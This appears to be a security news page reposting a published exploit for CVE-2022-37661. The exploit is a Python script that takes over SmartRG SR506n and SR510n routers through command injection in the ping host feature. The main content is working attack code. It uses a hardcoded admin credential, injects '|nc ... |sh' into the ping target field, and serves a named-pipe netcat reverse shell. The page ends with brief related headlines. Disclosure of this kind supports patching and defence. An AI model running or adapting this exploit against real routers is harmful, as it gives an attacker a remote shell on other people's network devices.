Headline
CVE-2022-37661: SmartRG Router 2.6.13 Remote Code Execution ≈ Packet Storm
SmartRG SR506n 2.5.15 and SR510n 2.6.13 routers are vulnerable to Remote Code Execution (RCE) via the ping host feature.
# Exploit Title: SmartRG Router - Remote Code Execution# Date: 13/06/2022# Exploit Author: Yerodin Richards# Vendor Homepage: https://adtran.com# Version: 2.5.15 / 2.6.13 (confirmed)# Tested on: SR506n (2.5.15) & SR510n (2.6.13)# CVE : CVE-2022-37661import requestsfrom subprocess import Popen, PIPErouter_host = "http://192.168.1.1"authorization_header = "YWRtaW46QWRtMW5ATDFtMyM="lhost = "lo"lport = 80payload_port = 81def main(): e_proc = Popen(["echo", f"rm /tmp/s & mknod /tmp/s p & /bin/sh 0< /tmp/s | nc {lhost} {lport} > /tmp/s"], stdout=PIPE) Popen(["nc", "-nlvp", f"{payload_port}"], stdin=e_proc.stdout) send_payload(f"|nc {lhost} {payload_port}|sh") print("done.. check shell")def get_session(): url = router_host + "/admin/ping.html" headers = {"Authorization": "Basic {}".format(authorization_header)} r = requests.get(url, headers=headers).text i = r.find("&sessionKey=") + len("&sessionKey=") s = "" while r[i] != "'": s = s + r[i] i = i + 1 return sdef send_payload(payload): print(payload) url = router_host + "/admin/pingHost.cmd" headers = {"Authorization": "Basic {}".format(authorization_header)} params = {"action": "add", "targetHostAddress": payload, "sessionKey": get_session()} requests.get(url, headers=headers, params=params).textmain()
Related news
SmartRG Router SR510n 2.6.13 Remote Code Execution
SmartRG Router SR510n version 2.6.13 suffers from a remote code execution vulnerability.
SmartRG Router 2.6.13 Remote Code Execution
SmartRG Router version 2.6.13 suffers from a remote code execution vulnerability.